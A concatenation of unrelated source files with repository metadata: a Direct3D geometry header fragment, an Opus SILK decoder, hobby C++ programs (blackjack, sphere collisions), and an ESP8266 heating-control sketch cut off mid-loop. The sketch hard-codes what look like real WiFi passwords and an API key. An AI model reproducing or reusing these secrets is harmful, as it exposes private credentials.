IDirect3DRMMesh* GetMesh (void) const; Bbox3 GetBox (void); void SetD3DQuality (D3DRMRENDERQUALITY); void SetD3DMapping (D3DRMMAPPING); // Create a meshbuilder from the mesh and cache for subsequent calls. IDirect3DRMMeshBuilder* GetMeshBuilder (void); // TODO: Not a type in avrtypes.h?? virtual DXMTypeInfo GetTypeInfo() { return AxATrivialType; } protected: IDirect3DRMMesh* _mesh; int _numGroups; // Flags int _opacityBugWorkaroundID; AttrState _overrideAttrs; // Override Attribute Values AttrState *_defaultAttrs; // Default Attr Values For All Mesh Groups IDirect3DRMMeshBuilder* _optionalBuilder; }; // This method returns true if the mesh has not yet been initialized, or // if the meshInfo object has been cleaned up. inline bool MeshInfo::IsEmpty (void) const { return (_mesh == NULL); } // This method returns the contained RM mesh object. inline IDirect3DRMMesh* MeshInfo::GetMesh (void) const { return _mesh; } /***************************************************************************** This is the superclass for all D3DRM primitives. In encompasses both DX3 and DX6 type objects. *****************************************************************************/ class ATL_NO_VTABLE RMVisualGeo : public Geometry { public: RMVisualGeo (void); // The following methods are no-ops for RMVisualGeo's void CollectSounds (SoundTraversalContext &context) {}; void CollectLights (LightContext &context) {}; void CollectTextures (GeomRenderer &device) {}; // The GenericDevice render method calls the real Render method. void Render (GenericDevice& dev); virtual void Render (GeomRenderer &geomRenderer) = 0; void RayIntersect (RayIntersectCtx &context); virtual void CleanUp (void) = 0; virtual IDirect3DRMVisual *Visual (void) = 0; virtual Bbox3 *BoundingVol (void) = 0; VALTYPEID GetValTypeId() { return RMVISUALGEOM_VTYPEID; } class RMVisGeoDeleter : public DynamicHeap::DynamicDeleter { public: RMVisGeoDeleter (RMVisualGeo *obj) : _obj(obj) {} void DoTheDeletion (void) { _obj->CleanUp(); } RMVisualGeo *_obj; }; }; /***************************************************************************** This class is a superclass for the frame and mesh object classes. *****************************************************************************/ class ATL_NO_VTABLE RM1VisualGeo : public RMVisualGeo { public: // By default, the Render method passes this object to the device's Render // method. void Render (GeomRenderer &geomRenderer) { geomRenderer.Render (this); } // New virtual function to apply material properties virtual void SetMaterialProperties ( Color *emissive, Color *diffuse, Color *specular, Real specularExp, Real opacity, IDirect3DRMTexture *texture, bool shadowmode, int renderDevID) = 0; virtual void SetD3DMapping (D3DRMMAPPING mapping) = 0; virtual void SetD3DQuality (D3DRMRENDERQUALITY quality) = 0; Bbox3 *BoundingVol (void) { return NEW Bbox3 (_bbox); } protected: Bbox3 _bbox; }; /***************************************************************************** The RM1MeshGeo class contains information about a single D3DRM mesh object. Note that there's an implicit mesh AddRef for the lifetime of this class. Users of this class should Release() the given mesh if they are done using it after construction of this object. *****************************************************************************/ class RM1MeshGeo : public RM1VisualGeo { public: RM1MeshGeo (IDirect3DRMMesh *mesh, bool trackGenIDs = false); ~RM1MeshGeo() { CleanUp(); } void CleanUp (void); void Render (GeomRenderer &geomRenderer); void SetMaterialProperties ( Color *emissive, Color *diffuse, Color *specular, Real specularExp, Real opacity, IDirect3DRMTexture *texture, bool shadowmode, int renderDevID); void SetD3DQuality (D3DRMRENDERQUALITY quality); void SetD3DMapping (D3DRMMAPPING mapping); IDirect3DRMVisual *Visual (void) { return _meshInfo.GetMesh(); } void MeshGeometryChanged (void); #if _USE_PRINT ostream& Print (ostream& os) { return os << "RM1MeshGeo[" << (void*)(this) << "]"; } #endif protected: MeshInfo _meshInfo; IDXBaseObject *_baseObj; // don't keep a reference }; /***************************************************************************** The RM1FrameGeo class contains information about a D3DRM frame hierarchy. It takes the root frame pointer, and a list of meshes contained in the frame hierarchy. NOTE: The meshes in the list are not AddRef'ed; it is assumed that they each have a reference from withing the given frame hierarchy. Users of this class should Release() the frame (and meshes, if AddRef'ed individually) if they are done using it after constructing this class. *****************************************************************************/ class RM1FrameGeo : public RM1VisualGeo { public: RM1FrameGeo ( IDirect3DRMFrame* frame, vector<IDirect3DRMMesh*> *internalMeshes, Bbox3 *bbox); ~RM1FrameGeo() { CleanUp(); } void CleanUp (void); void SetMaterialProperties ( Color *emissive, Color *diffuse, Color *specular, Real specularExp, Real opacity, IDirect3DRMTexture *texture, bool shadowmode, int renderDevID); void SetD3DQuality (D3DRMRENDERQUALITY quality); void SetD3DMapping (D3DRMMAPPING mapping); IDirect3DRMVisual *Visual (void) { return _frame; } virtual void DoKids(GCFuncObj proc); #if _USE_PRINT ostream& Print (ostream& os) { return os << "RM1FrameGeo[" << (void*)(this) << "]"; } #endif protected: IDirect3DRMFrame *_frame; int _numMeshes; MeshInfo **_meshes; }; /***************************************************************************** This class is a superclass for all RM3 interface (RM6) geometries. *****************************************************************************/ class ATL_NO_VTABLE RM3VisualGeo : public RMVisualGeo { public: // By default, the Render method passes this object to the device's Render // method. void Render (GeomRenderer &geomRenderer) { geomRenderer.Render (this); } }; /***************************************************************************** This class wraps a D3DRMMeshBuilder3 object. *****************************************************************************/ class RM3MBuilderGeo : public RM3VisualGeo { public: RM3MBuilderGeo (IDirect3DRMMeshBuilder3*, bool trackGenIDs); RM3MBuilderGeo (IDirect3DRMMesh *); // Reset meshbuilder to the contents of the given mesh. void Reset (IDirect3DRMMesh*); ~RM3MBuilderGeo() { CleanUp(); } void CleanUp (void); void Render (GeomRenderer &geomRenderer); inline IDirect3DRMVisual *Visual (void) { return _mbuilder; } inline Bbox3* BoundingVol (void) { return NEW Bbox3 (_bbox); } #if _USE_PRINT ostream& Print (ostream& os) { return os << "RM3MBuilderGeo[" << (void*)(this) << "]"; } #endif void TextureWrap(TextureWrapInfo *wrapInfo); void Optimize (void); protected: void SetBbox (void); // Auto-set Meshbuilder Bounding Box IDirect3DRMMeshBuilder3 *_mbuilder; // Wrapped MeshBuilder Object IDXBaseObject *_baseObj; // For Tracking Generation ID's Bbox3 _bbox; }; /***************************************************************************** This class wraps a static (non-animate) D3DRMFrame3 object. *****************************************************************************/ class RM3FrameGeo : public RM3VisualGeo { public: RM3FrameGeo (IDirect3DRMFrame3 *frame); ~RM3FrameGeo() { CleanUp(); } void CleanUp (void); IDirect3DRMVisual *Visual (void) { return _frame; } Bbox3* BoundingVol (void) { return NEW Bbox3 (_bbox); } #if _USE_PRINT ostream& Print (ostream& os) { return os << "RM3FrameGeo[" << (void*)(this) << "]"; } #endif void TextureWrap (TextureWrapInfo *info); protected: IDirect3DRMFrame3 *_frame; // Frame Hierarcy Bbox3 _bbox; // Static Cached Bounding Box }; /***************************************************************************** This class manages a progressive mesh object. *****************************************************************************/ class RM3PMeshGeo : public RM3VisualGeo { public: RM3PMeshGeo (IDirect3DRMProgressiveMesh *pmesh); ~RM3PMeshGeo() { CleanUp(); } void CleanUp (void); IDirect3DRMVisual *Visual (void) { return _pmesh; } Bbox3* BoundingVol (void) { return NEW Bbox3 (_bbox); } #if _USE_PRINT ostream& Print (ostream& os) { return os << "RM3PMeshGeo[" << (void*)(this) << "]"; } #endif protected: IDirect3DRMProgressiveMesh *_pmesh; // Progressive Mesh Bbox3 _bbox; // The bounding box will always be the largest bounding box // of all possible refinements of the pmesh. }; #endif
cc759432120ff8c05653aa6c22a8a66e0c1a0601
e541d2bc575eb68818c0b2eeeeeabe0de209574f
/src/YouMeCommon/opus-1.1/silk/decode_pulses.cpp
c71b30f21eb691137a2dd10e339e4db3faa98cd5
[]
no_license
wangscript007/dev
0d673981718993df0b971a5cd7a262cc217c6d9d
e47da659aadc220883b5e8067b25dc80108876b9
refs/heads/master
2022-08-05T00:53:31.844228
2020-05-24T05:20:44
2020-05-24T05:20:44
null
0
0
null
null
null
null
UTF-8
C++
false
false
5,650
cpp
decode_pulses.cpp
/*********************************************************************** Copyright (c) 2006-2011, Skype Limited. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. - Neither the name of Internet Society, IETF or IETF Trust, nor the names of specific contributors, may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ***********************************************************************/ #ifdef HAVE_CONFIG_H #include "config.h" #endif #include "main.h" namespace youmecommon { /*********************************************/ /* Decode quantization indices of excitation */ /*********************************************/ void silk_decode_pulses( ec_dec *psRangeDec, /* I/O Compressor data structure */ opus_int16 pulses[], /* O Excitation signal */ const opus_int signalType, /* I Sigtype */ const opus_int quantOffsetType, /* I quantOffsetType */ const opus_int frame_length /* I Frame length */ ) { opus_int i, j, k, iter, abs_q, nLS, RateLevelIndex; opus_int sum_pulses[ MAX_NB_SHELL_BLOCKS ], nLshifts[ MAX_NB_SHELL_BLOCKS ]; opus_int16 *pulses_ptr; const opus_uint8 *cdf_ptr; /*********************/ /* Decode rate level */ /*********************/ RateLevelIndex = ec_dec_icdf( psRangeDec, silk_rate_levels_iCDF[ signalType >> 1 ], 8 ); /* Calculate number of shell blocks */ silk_assert( 1 << LOG2_SHELL_CODEC_FRAME_LENGTH == SHELL_CODEC_FRAME_LENGTH ); iter = silk_RSHIFT( frame_length, LOG2_SHELL_CODEC_FRAME_LENGTH ); if( iter * SHELL_CODEC_FRAME_LENGTH < frame_length ) { silk_assert( frame_length == 12 * 10 ); /* Make sure only happens for 10 ms @ 12 kHz */ iter++; } /***************************************************/ /* Sum-Weighted-Pulses Decoding */ /***************************************************/ cdf_ptr = silk_pulses_per_block_iCDF[ RateLevelIndex ]; for( i = 0; i < iter; i++ ) { nLshifts[ i ] = 0; sum_pulses[ i ] = ec_dec_icdf( psRangeDec, cdf_ptr, 8 ); /* LSB indication */ while( sum_pulses[ i ] == SILK_MAX_PULSES + 1 ) { nLshifts[ i ]++; /* When we've already got 10 LSBs, we shift the table to not allow (SILK_MAX_PULSES + 1) */ sum_pulses[ i ] = ec_dec_icdf( psRangeDec, silk_pulses_per_block_iCDF[ N_RATE_LEVELS - 1] + ( nLshifts[ i ] == 10 ), 8 ); } } /***************************************************/ /* Shell decoding */ /***************************************************/ for( i = 0; i < iter; i++ ) { if( sum_pulses[ i ] > 0 ) { silk_shell_decoder( &pulses[ silk_SMULBB( i, SHELL_CODEC_FRAME_LENGTH ) ], psRangeDec, sum_pulses[ i ] ); } else { silk_memset( &pulses[ silk_SMULBB( i, SHELL_CODEC_FRAME_LENGTH ) ], 0, SHELL_CODEC_FRAME_LENGTH * sizeof( pulses[0] ) ); } } /***************************************************/ /* LSB Decoding */ /***************************************************/ for( i = 0; i < iter; i++ ) { if( nLshifts[ i ] > 0 ) { nLS = nLshifts[ i ]; pulses_ptr = &pulses[ silk_SMULBB( i, SHELL_CODEC_FRAME_LENGTH ) ]; for( k = 0; k < SHELL_CODEC_FRAME_LENGTH; k++ ) { abs_q = pulses_ptr[ k ]; for( j = 0; j < nLS; j++ ) { abs_q = silk_LSHIFT( abs_q, 1 ); abs_q += ec_dec_icdf( psRangeDec, silk_lsb_iCDF, 8 ); } pulses_ptr[ k ] = abs_q; } /* Mark the number of pulses non-zero for sign decoding. */ sum_pulses[ i ] |= nLS << 5; } } /****************************************/ /* Decode and add signs to pulse signal */ /****************************************/ silk_decode_signs( psRangeDec, pulses, frame_length, signalType, quantOffsetType, sum_pulses ); } } // namespace youmecommon
3456aee5f65547c2e0ecf2b82b604c7e1b394a00
566e2cbda89eb6da919b10d527a40b166f0c833b
/line.h
75dba8d548f911e27fabda25f80760b14dc8cdf9
[]
no_license
iplayfast/arduino-scope
d1b4c4d34fc3fb41ec8ae8ac4729b089049ffbad
2c45c33e7c0bf6586ef5ebdca36429916e5f84ae
refs/heads/master
2016-09-11T07:10:21.936888
2011-07-07T08:27:31
2011-07-07T08:27:31
1,874,060
1
1
null
null
null
null
UTF-8
C++
false
false
767
h
line.h
#ifndef LINES_H #define LINES_H #include "TFuzzy.h" #define TRACELENGTH 10000 #define CHANNELNUM 2 using namespace Crystal; using namespace Fuzzy; class line { int timemark[TRACELENGTH]; int value[CHANNELNUM][TRACELENGTH]; int end; bool visible[CHANNELNUM]; int scale[CHANNELNUM]; ClassFuzzy channel[CHANNELNUM]; public: line(); void AddSample(int* val); void AddSample(int time, int channel, int value); int GetChSample(int start, int ch) const; int GetTime(int start); int GetY(int ch,int time); void IncScale(int ch); void DecScale(int ch); bool IsVisible(int ch) const; void ToggleVisible(int ch); int GetScale(int ch) const; void Reset(); int GetBaseTime() const; int GetMaxTime() const; int GetEnd() const; }; #endif
6d3c1aa465fef0db69fd93682e85fa5b0188ae0c
0a171c85b541be11361505fb750a750f5b4f85ac
/C/lessons/lesson17/my_define/main.cpp
4d470aedd7f8d5d8d8f4fc7f7338066b83eb645c
[]
no_license
ukod/StepAcademyLessons
dc55f735a17071dd35ab5348e02915ef3c293677
5b6e7abbd7d79f38a1c0188a09794314de05c198
refs/heads/master
2021-04-15T07:34:32.049511
2016-01-30T20:30:41
2016-01-30T20:30:41
126,335,262
0
0
null
null
null
null
UTF-8
C++
false
false
480
cpp
main.cpp
#include "header.h" int main() { char buffer[500]; int amountOfDefines = sizeCalculateForDefineArray(); defineStruct* defineUnit = (defineStruct*) malloc (amountOfDefines*sizeof(defineStruct)); inFileSearch(defineUnit, amountOfDefines); for(int i=0; i<amountOfDefines; ++i){ cout << "Имя: " << defineUnit[i].nameOfDirrective << endl << "Значение: " << defineUnit[i].valueOfDirrective << endl; } free(defineUnit); return 0; }
a0d91924a451c3657d850cbc929e5cd2f829b231
c54c8d84c1309372ea506fc6f28fdee1479ad782
/blackjack.cpp
b008c7ec4130da5e151032eb26013a0a43d03020
[]
no_license
ronaldroldanurrutia/juegopersonal
25c88e1ed99855c5f55bc72f9c535c15feddbccf
de464206a770e4dd577d3cdb6b852815631ea31a
refs/heads/master
2020-01-23T21:59:18.068109
2016-11-25T02:25:21
2016-11-25T02:25:21
74,718,766
0
0
null
null
null
null
UTF-8
C++
false
false
2,022
cpp
blackjack.cpp
#include<iostream> #include<windows.h> #include<stdlib.h> #include<stdio.h> #include<list> #define WIN 21 using namespace std; int arr[13]; void formar(void){ for(int i = 0 ; i < 13; i++){ arr[i] = 4; } } class jugador{ private: int x; int acumulado; public: jugador(const int x = 0,const int acumulado = 0){ this->x = x; this->acumulado = acumulado; } virtual void mostrar(){ cout<<this->x<<endl; } void insertx(const int x){ this->x = x; } bool probar(int x){ if(x == WIN){ return true; } return false; } bool lose(int x){ if(x > WIN){ return true; } return false; } void poner(void){ this->x = rand()%12 + 1; while(arr[this->x-1]==0){ this->x = rand()%12 + 1; } arr[this->x-1]--; this->acumulado+=this->x; this->x = 0; } void mostrares(void){ cout<<this->x<<endl; } }; list<jugador*>lis; list<jugador*>::iterator elemento; /*virtual void jugador<T>:: mostrar(){ cout<<this->x<<endl; }*/ void crear (int n){ for(int i = 0 ; i < n ;i++){ lis.push_back(new jugador(rand()%12 + 1)); } for(elemento = lis.begin() ; elemento != lis.end() ; elemento ++){ (*elemento)->poner(); } elemento = lis.begin(); for(int i = 0 ; i < n ; i++,elemento++){ (*elemento)->mostrares(); } } int main(){ int n; formar(); cout<<"Inserte Personas: "; cin>>n; while(n > 5){ cout<<"muchas personas inserte de nuevo"<<endl; cout<<"Inserte Personas: "; cin>>n; } crear(n); return 0; }
2f2b19f318c32505f7636fec6d49e6d04ac3e0e9
a6bb89b2ff6c1fc8c45a4f105ef528416100a360
/examples/tut8/collision/coll1.cpp
c45546f72ae3213c7a03ae8b11f06edf7de7b017
[]
no_license
dudochkin-victor/ngxe
2c03717c45431b5a88a7ca4f3a70a2f23695cd63
34687494bcbb4a9ce8cf0a7327a7296bfa95e68a
refs/heads/master
2016-09-06T02:28:20.233312
2013-01-05T19:59:28
2013-01-05T19:59:28
7,311,793
0
1
null
null
null
null
UTF-8
C++
false
false
9,736
cpp
coll1.cpp
/* Copyright (C) 2005 Heinrich du Toit This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA The license can also be obtained electronically at www.fsf.org or www.freesoftware.org/licenses I can be electronically reached at the following email addresses: 13806335@sun.ac.za (will work till end of 2005) nlhg@eject.co.za */ /* * By Heinrich du Toit * * A small example to show the basic of mechanical physics (Newton) * Tutorial 7 * */ #include <iostream> using namespace std; #include <SDL/SDL.h> #include <GL/gl.h> #include <GL/glu.h> #include <video.h> #include <event.h> #include <light.h> #define TRUE 1 #define FALSE 0 /* * A very simple class to use for an object with mass/velocity and forces acting in on it * */ typedef class Objectclass{ public: Objectclass(); //directly alter settings! void SetMass(GLfloat m) {mass = m;} void SetPosition(GLfloat x,GLfloat y,GLfloat z); void SetVelocity(GLfloat vx,GLfloat vy,GLfloat vz); void SetAcceleration(GLfloat ax,GLfloat ay,GLfloat az); //get state GLfloat GetMass() {return mass;} GLfloat GetPosition(GLint i){return pos[i];} GLfloat GetVelocity(GLint i){return vel[i];} GLfloat GetAcceleration(GLint i){return acc[i];} //force calculation void ResetForce() {acc[0] = 0;acc[1] = 0;acc[2] = 0;} void AddForce(GLfloat fx,GLfloat fy,GLfloat fz); void AddForce(GLfloat *f){AddForce(f[0],f[1],f[2]);} void AddGravity(){acc[1] -= 9.8;} //add gravitation force in the negative y axis direction //update frame void Update(GLfloat timescale); //calculate new vel and loc //to make the opengl a bit easier: void Translate(){glTranslatef(pos[0],pos[1],pos[2]);} protected: GLfloat mass; GLfloat pos[3]; //location/position GLfloat vel[3]; //velocity/speed GLfloat acc[3]; //acceleration } Objectclass; Objectclass::Objectclass() { mass = 1; //defualt value :) pos[0] = 0;pos[1] = 0; pos[2] = 0; vel[0] = 0;vel[1] = 0; vel[2] = 0; acc[0] = 0;acc[1] = 0; acc[2] = 0; } void Objectclass::SetPosition(GLfloat x,GLfloat y,GLfloat z) { pos[0] = x; pos[1] = y; pos[2] = z; } void Objectclass::SetVelocity(GLfloat vx,GLfloat vy,GLfloat vz) { vel[0] = vx; vel[1] = vy; vel[2] = vz; } void Objectclass::SetAcceleration(GLfloat ax,GLfloat ay,GLfloat az) { acc[0] = ax; acc[1] = ay; acc[2] = az; } void Objectclass::AddForce(GLfloat fx,GLfloat fy,GLfloat fz) { //F=ma acc[0] += fx/mass; acc[1] += fy/mass; acc[2] += fz/mass; } void Objectclass::Update(GLfloat timescale) { //this is the action ;) vel[0] += acc[0]*timescale; vel[1] += acc[1]*timescale; vel[2] += acc[2]*timescale; pos[0] += vel[0]*timescale; pos[1] += vel[1]*timescale; pos[2] += vel[2]*timescale; } typedef class Sphereclass: public Objectclass{ public: //constructor Sphereclass():radius(0){} //setup parameters void SetRadius(GLfloat r){radius = r;} //read parameters GLfloat GetRadius(){return radius;} void SetElasticity(GLfloat e){elastic = e;} GLfloat GetElasticity(){return elastic;} //collision with other sphere int CheckCollision(Sphereclass &s,GLfloat deltatime); GLfloat GetColtime(){return coltime;} int HandleCollision(Sphereclass &s); protected: GLfloat radius; GLfloat elastic; //factor //collision data: GLfloat coltime; }Sphereclass; int Sphereclass::CheckCollision(Sphereclass &s,GLfloat deltatime) { //note: s is also Sphereclass so we can access variables directly! GLfloat deltapos[3]; GLfloat deltavel[3]; for (int k=0; k < 3; k++){ //the compiler will unroll this loop for us if optimization enabled deltapos[k] = pos[k]-s.pos[k]; deltavel[k] = vel[k]-s.vel[k]; } GLfloat a,b,c; //for the quadratic equation a = deltavel[0]*deltavel[0]+deltavel[1]*deltavel[1]+deltavel[2]*deltavel[2]; if (abs(a) < 0.000001) return FALSE; //spheres moving 2 slowly b = 2*deltavel[0]*deltapos[0]+2*deltavel[1]*deltapos[1]+2*deltavel[2]*deltapos[2]; c = deltapos[0]*deltapos[0]+deltapos[1]*deltapos[1]+deltapos[2]*deltapos[2]; c -= (radius+s.radius)*(radius+s.radius); //what this should equal 2 GLfloat delta; delta = b*b - 4*a*c; if (delta < 0) return FALSE; //no collision ever with current speeds/positions delta = sqrt(delta); a = 2*a; GLfloat dt,dt1; dt = (-b + delta)/(a); dt1 = (-b - delta)/(a); if (dt1 < dt) dt = dt1; //put in some exstra margins of 1% outside time boundary if ((dt >= -0.01)&&(dt <= (deltatime*1.01))){ //OK we have a collision! coltime = dt; s.coltime = dt; return TRUE; } return FALSE; } int Sphereclass::HandleCollision(Sphereclass &s) { GLfloat normal[3]; for (int k=0; k< 3; k++) normal[k] = s.pos[k]-pos[k]; //normalize GLfloat normalsize; normalsize = sqrt(normal[0]*normal[0]+normal[1]*normal[1]+normal[2]*normal[2]); for (int k=0; k< 3; k++) normal[k] /= normalsize; //calculate the normal velocities //and remove them from the objects current velocity state GLfloat vel1[3]; //this sphere GLfloat vel2[3]; //other sphere for (int k=0; k< 3; k++){ vel1[k] = vel[k]*normal[k]; vel[k] *= (1-fabs(normal[k])); vel2[k] = s.vel[k]*(-normal[k]); s.vel[k] *= (1-fabs(normal[k])); } //calculate normal velocity GLfloat nvel1,nvel2; nvel1 = sqrt(vel1[0]*vel1[0]+vel1[1]*vel1[1]+vel1[2]*vel1[2]); nvel2 = sqrt(vel2[0]*vel2[0]+vel2[1]*vel2[1]+vel2[2]*vel2[2]); //now its a 1D collision :) //calculate final velocity GLfloat fvel1,fvel2; fvel1 = nvel1*(mass-elastic*s.mass)/(mass+s.mass) +nvel2*(elastic+1)*(s.mass)/(mass+s.mass); fvel2 = nvel2*(s.mass-s.elastic*mass)/(mass+s.mass) +nvel1*(s.elastic+1)*(mass)/(mass+s.mass); //add velocities back into object for (int k=0; k< 3; k++){ vel[k] -= fvel1*(normal[k]); s.vel[k] += fvel2*(normal[k]); } return TRUE; } //global variables GLfloat timescale; Sphereclass ball1; Sphereclass ball2; GLUquadric *sphere; void drawscene() { //update physics on ball ball1.ResetForce(); ball1.AddGravity(); ball2.ResetForce(); ball2.AddGravity(); if (ball1.CheckCollision(ball2,timescale)){ timescale = ball1.GetColtime(); //move balls to perfect position ball1.Update(timescale); ball2.Update(timescale); //handle the collision now: ball1.HandleCollision(ball2); cout << "Collision" << endl; }else{ //continue normal bahaviour ball1.Update(timescale); ball2.Update(timescale); } //go graphics glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT); glMatrixMode(GL_MODELVIEW); glLoadIdentity(); glTranslatef(0,0,-10); glPushMatrix(); ball1.Translate(); //draw the little ball glColor3f(1,0,0); //red ball :) gluSphere(sphere,ball1.GetRadius(),36,18); glPopMatrix(); //the second ball: glPushMatrix(); ball2.Translate(); glColor3f(0.5,0.5,1); //light blue ball :) gluSphere(sphere,ball2.GetRadius(),36,18); glPopMatrix(); SDL_GL_SwapBuffers(); } int main() { cout << "This is Tut7-phys1 example running" << endl; //Step 1 is to initialize SDL. Absolutely critical that your SDL application starts with this! if (SDL_Init(SDL_INIT_VIDEO) != 0){ cout << "Error initializing SDL" << endl; return -1; } //Step 2 is to get a screen/window on which we can do some graphics. //create a Videoclass to control the video with SDLVideoclass SDLmain(640,480); if (SDLmain.InitVideo()){ cout << "Video up and running" << endl; }else{ cout << "Error initializing Video" << endl; return 0; } //get the events up and running SDLEventclass SDLevent; glEnable(GL_DEPTH_TEST); //enable depth buffer glShadeModel(GL_SMOOTH); //use smooth shading mode. //setup camera: glMatrixMode(GL_PROJECTION); gluPerspective(45.0f,1.33,0.1f,100.0f); //setup the camera glClearColor(0.0,0.0,0.2,0.0); //enable lighting to improve seen depth idea GLLightclass light; light.EnableLight(); GLfloat pos[] = {5,5,0}; light.SetPosition(pos); GLfloat ambient[] = {0.3,0.3,0.3}; light.SetAmbient(ambient); GLfloat spec[] = {0.7,0.7,0.7}; light.SetSpecular(spec); glEnable(GL_LIGHTING); //some material stuff glColorMaterial(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE); glEnable(GL_COLOR_MATERIAL); GLfloat matspec[] = {1.0,0.8,0.8}; glMaterialfv(GL_FRONT_AND_BACK,GL_SPECULAR,matspec); glMaterialf(GL_FRONT_AND_BACK,GL_SHININESS,50); //setup ball: ball1.SetMass(4); ball1.SetPosition(-4,0,0); ball1.SetVelocity(6,6.4,0); ball1.SetRadius(0.35); ball1.SetElasticity(1); ball2.SetMass(8); ball2.SetPosition(4,0,0); ball2.SetVelocity(-6,7.1,0); ball2.SetRadius(0.7); ball2.SetElasticity(0); sphere = gluNewQuadric(); Uint32 curticks,prevticks; curticks = SDL_GetTicks(); //main program loop cout << "Press ESC to quit!" << endl; while (!SDLevent.MustQuit()){ SDLevent.ProcessEvent(); //timescale calculation prevticks = curticks; curticks = SDL_GetTicks(); timescale = GLfloat(curticks-prevticks)/1000.0; drawscene(); } SDL_Quit(); return 0; }
7f70d95a0a4d696d3716b932f62d690bd2e68e4e
a9fdca914b98ff912a249c882d63c33f6efa2706
/temperaturewifiV5/temperaturewifiV5.ino
0d29d9755b8d1a76baf22d461de80d5ed9b401e7
[]
no_license
Stcasper/ChauffageElectro
cd38e2139ce9b5f43cd6b1cbb18faa752f878928
db38f6ee79e300e52a7768a8df3b22235592d4af
refs/heads/master
2021-11-23T03:56:13.254278
2021-11-20T18:32:17
2021-11-20T18:32:17
129,902,409
0
0
null
null
null
null
UTF-8
C++
false
false
10,633
ino
temperaturewifiV5.ino
/* */ #include <ESP8266WiFi.h> #include <DHT.h> #define DHTPIN D7 // Pin sur lequel est branché le DHT #define DHTTYPE DHT22 // DHT 22 (AM2302) // valeurs pour le WiFi //const char* ssid = "rezomaizon"; //const char* password = "jepensequeprendresonpetitdejeunerlematinestmeilleur"; const char* ssid = "Livebox-294C"; const char* password = "2DD96EE3FEAA2DCFDAD1DE7D2A"; // valeurs pour le serveur Web const char* host = "api.openweathermap.org"; const char* apikey = "f9203a3faba4eba9b6f486e5ca3e86fe"; // il est possible d'utiliser la clé d'API suivante : 1a702a15a2f46e405e61804cf67c0d30 const char* town = "Blere,fr"; //const char* town = "Meudon,fr"; const int httpPort = 80; const char* serverPerso = "stcasper.free.fr"; const int radiateur = 4; /* Code d'erreur du capteur de température */ const byte DHT_SUCCESS = 0; // Pas d'erreur const byte DHT_TIMEOUT_ERROR = 1; // Temps d'attente dépassé const byte DHT_CHECKSUM_ERROR = 2; // Données reçues erronées //Délais const int timeoutMesure = 1; // Interval entre deux mesures en minutes const int timeoutWiFi = 10000; // Timeout si le wifi ne répond pas au moment du démarrage en ms const int timeoutReset = 12; // Reboot régulier en heures // Variables float temperature; // Température extérieur float temp_int; // Température intérieure float humidity; // Humidité float humidity_int; // Humidité intérieure float consigne=7; // Température de consigne float consigneSauve=7; // Température de consigne de sauvegarde int allume=0; // Mise en route du chauffage (1 ou 0) DHT dht(DHTPIN, DHTTYPE); // Capteur de température int modeChauf = 0; // Mode de chauffage. 0 = Confort. 1 = Eco. 9 = Sauvegarde. boolean debug = true; // Mode debug int temps = 0; int tempsSauve = 0; String url; String data; int led = D5; int blink; int chauffage = D2; int status = WL_IDLE_STATUS; void setup() { if (debug) { Serial.begin(9600); } // Initialisation des entrées/sorties pinMode(led, OUTPUT); pinMode(chauffage, OUTPUT); pinMode(DHTPIN, INPUT_PULLUP); // Extinction du chauffage à l'init. digitalWrite(chauffage, LOW); // Allumage la led de fonctionnement digitalWrite(led, HIGH); // Initialisation de la sonde de tepérature dht.begin(); } void loop() { // Si le wifi n'est pas connecté on passe en mode sauvegarde if (WiFi.status() != WL_CONNECTED){ if (debug) { Serial.print("WiFi non connecté"); } modeChauf=9; } if (modeChauf==0) { WiFiClient client; /* Début de la mesure extérieure */ url = String("/data/2.5/weather?q=") + town + "&appid=" + apikey; if (debug){ Serial.print("Connexion au serveur : "); Serial.println(host); } client.connect(host, httpPort); if (debug) { Serial.print("demande URL: "); Serial.println(url); } client.print(String("GET ") + url + " HTTP/1.1\r\n" + "Host: " + host + "\r\n" + "Connection: close\r\n\r\n"); delay(1000); lectureValeurs (client, String("\"temp\":"),String("\"humidity\":")); /* Fin de la lecture de la température extérieure */ /*lecture de la température de consigne */ url = String("/temperature/temp_rest.php?rquest=read_consigne&Radiateur=")+String(radiateur); if (debug){ Serial.print("Connexion au serveur : "); Serial.println(serverPerso); } client.connect(serverPerso, httpPort); if (debug) { Serial.print("demande URL: "); Serial.println(url); } client.print(String("GET ") + url + " HTTP/1.1\r\n" + "Host: " + serverPerso + "\r\n" + "Connection: close\r\n\r\n"); delay(1000); lectureConsigne (client, String("\"Temperature\":\"")); /*Fin de la lecture de la température de consigne */ /* Mesure de la température de la pièce */ mesureTemp(); /* Prise de décision chauffage*/ if (temp_int<consigne) { allume = 1; digitalWrite(chauffage, HIGH); } else { allume = 0; digitalWrite(chauffage, LOW); } /* Fin 